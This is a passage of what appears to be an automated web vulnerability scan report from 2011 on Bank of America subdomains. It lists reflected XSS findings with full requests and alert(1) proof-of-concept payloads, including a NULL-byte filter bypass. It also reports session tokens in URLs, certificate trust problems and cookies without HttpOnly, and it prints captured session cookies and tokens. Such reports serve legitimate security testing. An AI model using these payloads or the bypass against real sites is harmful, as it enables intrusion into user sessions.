GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:19 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 558

                       function show_survey_popup()
       {
           var popup_url = "/insurance/insurance/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yesd885f"-alert(1)-"ce5d9ef8fa3";
           var new_window;
           window.name = "SurveyParentApplicationAbandon";
           //alert("window.name=" + window.name);
           new_window = window.open( popup_url, "AppAbandonPopupWindow", "width=1,height=1,top
...[SNIP]...

1.41. https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go [SurveyName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyInitPopupAction.go

Issue detail

The value of the SurveyName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a606"-alert(1)-"ba9f9d940ca was submitted in the SurveyName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey7a606"-alert(1)-"ba9f9d940ca&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:21 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 558

                       function show_survey_popup()
       {
           var popup_url = "/insurance/insurance/surveyPopupAction.go?SurveyName=Survey7a606"-alert(1)-"ba9f9d940ca&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes";
           var new_window;
           window.name = "SurveyParentApplicationAban
...[SNIP]...

1.42. https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go [SurveyUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyInitPopupAction.go

Issue detail

The value of the SurveyUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 647fa"-alert(1)-"bbc3c3fcfeb was submitted in the SurveyUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@647fa"-alert(1)-"bbc3c3fcfeb& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:24 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 558

                       function show_survey_popup()
       {
           var popup_url = "/insurance/insurance/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@647fa"-alert(1)-"bbc3c3fcfeb&SurveyDimensions=scrollbars@eq@yes";
           var new_window;
           window.name = "SurveyParentApplicationAbandon";
           //alert("window.name=" + window.name);
           new_window = window.open( popup_url, "AppAbandon
...[SNIP]...

1.43. https://www9.bankofamerica.com/insurance/surveyShowAction.go [SurveyDimensions parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The value of the SurveyDimensions request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4078"-alert(1)-"eb527228b21 was submitted in the SurveyDimensions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yesc4078"-alert(1)-"eb527228b21 HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:05 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Content-Length: 5911
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:41:06 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Launcher</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...

...[SNIP]...

1.44. https://www9.bankofamerica.com/insurance/surveyShowAction.go [SurveyName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The value of the SurveyName request parameter is copied into the HTML document as text between TITLE tags. The payload %003a30c</title><script>alert(1)</script>cfef02e96e9 was submitted in the SurveyName parameter. This input was echoed as 3a30c</title><script>alert(1)</script>cfef02e96e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /insurance/surveyShowAction.go?SurveyName=Survey%003a30c</title><script>alert(1)</script>cfef02e96e9&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:40:56 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Content-Length: 5935
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey%003a30c</title><script>alert(1)</script>cfef02e96e9; Expires=Tue, 03 Apr 2012 13:40:56 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Launcher</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...
<title>Bank of America | Customer Surveys | Survey%003a30c</title><script>alert(1)</script>cfef02e96e9 </title>
...[SNIP]...

1.45. https://www9.bankofamerica.com/insurance/surveyShowAction.go [SurveyUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The value of the SurveyUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd7c7"-alert(1)-"5b4eac0201d was submitted in the SurveyUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@cd7c7"-alert(1)-"5b4eac0201d&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:03 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Content-Length: 5911
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:41:02 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Launcher</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...

...[SNIP]...

1.46. https://www9.bankofamerica.com/home-loans/mortgage-purchase.go [state cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/mortgage-purchase.go

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71b12'-alert(1)-'0e55daf982a was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home-loans/mortgage-purchase.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT71b12'-alert(1)-'0e55daf982a; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:01:25 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 35332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>


...[SNIP]...
AddVars('page','Product','mortgage');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('page','Section','Product');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('session','State-Cookie','CT71b12'-alert(1)-'0e55daf982a');
               lpMTagConfig.defaultInvite = "chat-" + lpUnit + '-' + lpLanguage;
           }catch(e){}
       </SCRIPT>
...[SNIP]...

2. Session token in URL previous next
There are 2 instances of this issue:

/home-loans/mortgage/leads-and-prequal/mortgage-prequal.go
/mortgage/status/mymortgage-signin.go

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

2.1. https://www9.bankofamerica.com/home-loans/mortgage/leads-and-prequal/mortgage-prequal.go previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/home-loans/mortgage/leads-and-prequal/mortgage-prequal.go

Issue detail

The response contains the following links that appear to contain session tokens:

https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token=9DC0A8B40B2030BE48CC994ACF8E7234475C763CB0C2A4F191F4C97FD66B68EE19AEC9325C6F8FCC5939B4CDAB696AFB69A14A76564F1A40255AB19F86B2DE1201B1EE60F06948E2097D4B6A0981A4ADF9FC42DDD580648D0E1F189B3FAB53EEE96C0AD0063D07FB4C171F7C6D76AA1BE935931F7D2070B7E1D5A2869310BEC8E9F2C97ECB695A5E0E8A97C043657BBE7E908F54DA953F53E6670EFE43462A14310EDC042ABFB79415A755B5D4718F2F03BBC218CE3B6B511EB0C75AD797CDDEF5E7C515000A3C778995E36CE3C6578655D9198AC6E0B58882607F24D316E71910D11D746125A6B7D108EA6A5E68BE9C7D05F494D7215ADF5C120348DA10C02D2B19A02881486168B9FA24EAC7E00EE5ABD6930AFF55023F7A792498C50DB0E17FB64ADD772FAE538B23E527E1D1E73BD487766CBE0F1CDE819A1B173D6BC769E47E1F273519C84DEC8309E4839A528A67EADA16DA4B049007F2B4FEE04EAC30B8D1D07837CB33720D31A8907ACE044BC2E0BCB63F5924D0A0568C2E2DBC85CD6697083E2535628E996897420080B25DF760CF2C78C81EC46E0D05FF6E5B94D9250A8F61B6CE536A355CC84A893FCBB5B0C257678C88A943878302C638C300F7&source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949

Request

GET /home-loans/mortgage/leads-and-prequal/mortgage-prequal.go HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:23 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...
<noscript>
<iframe src="https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token=9DC0A8B40B2030BE48CC994ACF8E7234475C763CB0C2A4F191F4C97FD66B68EE19AEC9325C6F8FCC5939B4CDAB696AFB69A14A76564F1A40255AB19F86B2DE1201B1EE60F06948E2097D4B6A0981A4ADF9FC42DDD580648D0E1F189B3FAB53EEE96C0AD0063D07FB4C171F7C6D76AA1BE935931F7D2070B7E1D5A2869310BEC8E9F2C97ECB695A5E0E8A97C043657BBE7E908F54DA953F53E6670EFE43462A14310EDC042ABFB79415A755B5D4718F2F03BBC218CE3B6B511EB0C75AD797CDDEF5E7C515000A3C778995E36CE3C6578655D9198AC6E0B58882607F24D316E71910D11D746125A6B7D108EA6A5E68BE9C7D05F494D7215ADF5C120348DA10C02D2B19A02881486168B9FA24EAC7E00EE5ABD6930AFF55023F7A792498C50DB0E17FB64ADD772FAE538B23E527E1D1E73BD487766CBE0F1CDE819A1B173D6BC769E47E1F273519C84DEC8309E4839A528A67EADA16DA4B049007F2B4FEE04EAC30B8D1D07837CB33720D31A8907ACE044BC2E0BCB63F5924D0A0568C2E2DBC85CD6697083E2535628E996897420080B25DF760CF2C78C81EC46E0D05FF6E5B94D9250A8F61B6CE536A355CC84A893FCBB5B0C257678C88A943878302C638C300F7&source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949" height="200" width="250" frameborder=0 scrolling=no>
</iframe>
...[SNIP]...

2.2. https://www9.bankofamerica.com/mortgage/status/mymortgage-signin.go previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/mortgage/status/mymortgage-signin.go

Issue detail

The response contains the following links that appear to contain session tokens:

https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token=9DC0A8B40B2030BE48CC994ACF8E7234475C763CB0C2A4F191F4C97FD66B68EE19AEC9325C6F8FCC5939B4CDAB696AFB69A14A76564F1A40255AB19F86B2DE1201B1EE60F06948E2097D4B6A0981A4ADF9FC42DDD580648D0E1F189B3FAB53EEE96C0AD0063D07FB4C171F7C6D76AA1BE935931F7D2070B7A604B5F28DB65EAC46EC055C8628C4A93BC233B8465028C17745CFAA335C395ED917DB8183C4B056D232DDBB2D43AE56F7C6BEDC48A3B44DDD922A3F1E7A27A850E560B0F8B4A425011486F512B2F935597C48BC8B777CBB678A52C59EC05A648C93BAFEFD09402DA4B30951685930C49B8CAEB4E0BA00F3DF57654CC4CFECDCDAD2F2C5E36ADCBBC59DBFBCCEC60182085413785D708E439B89285C926E500CD8018498DF234F315E6FE608FB0C1C5CE984CAAC7F7434E2C421D6F6A9347CEFCB0B43AD16066CF5374E8C73E023178CCFD117EBBB59CE6BD82E35D808593F841204A221729199CE541B6C177731D83B4934BDA9BA45F22E201A08D5AC604DF6AC91809A80842649A44F709DED9D4B9EAFFFD888539498ECC38A912E919C8576DC78435730F3BD9970A060F1CDFF15CE0F8E66D4F764990E&source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949

Request

GET /mortgage/status/mymortgage-signin.go HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:26 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 40090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...
<noscript>
<iframe src="https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token=9DC0A8B40B2030BE48CC994ACF8E7234475C763CB0C2A4F191F4C97FD66B68EE19AEC9325C6F8FCC5939B4CDAB696AFB69A14A76564F1A40255AB19F86B2DE1201B1EE60F06948E2097D4B6A0981A4ADF9FC42DDD580648D0E1F189B3FAB53EEE96C0AD0063D07FB4C171F7C6D76AA1BE935931F7D2070B7A604B5F28DB65EAC46EC055C8628C4A93BC233B8465028C17745CFAA335C395ED917DB8183C4B056D232DDBB2D43AE56F7C6BEDC48A3B44DDD922A3F1E7A27A850E560B0F8B4A425011486F512B2F935597C48BC8B777CBB678A52C59EC05A648C93BAFEFD09402DA4B30951685930C49B8CAEB4E0BA00F3DF57654CC4CFECDCDAD2F2C5E36ADCBBC59DBFBCCEC60182085413785D708E439B89285C926E500CD8018498DF234F315E6FE608FB0C1C5CE984CAAC7F7434E2C421D6F6A9347CEFCB0B43AD16066CF5374E8C73E023178CCFD117EBBB59CE6BD82E35D808593F841204A221729199CE541B6C177731D83B4934BDA9BA45F22E201A08D5AC604DF6AC91809A80842649A44F709DED9D4B9EAFFFD888539498ECC38A912E919C8576DC78435730F3BD9970A060F1CDFF15CE0F8E66D4F764990E&source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949" height="200" width="250" frameborder=0 scrolling=no>
</iframe>
...[SNIP]...

3. SSL certificate previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www2.bankofamerica.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	www2.bankofamerica.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Tue May 10 19:00:00 CDT 2011
Valid to:	Thu May 10 18:59:59 CDT 2012

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

4. Cookie without HttpOnly flag set previous next
There are 65 instances of this issue:

http://homeloans.bankofamerica.com/docroot/js/rates.jsp
http://homeloans.bankofamerica.com/favicon.ico
https://privacyassist.bankofamerica.com/
https://www9.bankofamerica.com/insurance/life-and-health/term-life/overview.go
https://www9.bankofamerica.com/insurance/overview.go
https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
http://factsaboutfees.bankofamerica.com/
http://factsaboutfees.bankofamerica.com/assets/css/print.css
http://factsaboutfees.bankofamerica.com/assets/css/screen.css
http://factsaboutfees.bankofamerica.com/assets/css/ui-lightness/jquery-ui-1.7.2.custom.css
http://factsaboutfees.bankofamerica.com/assets/img/ajax-loader.gif
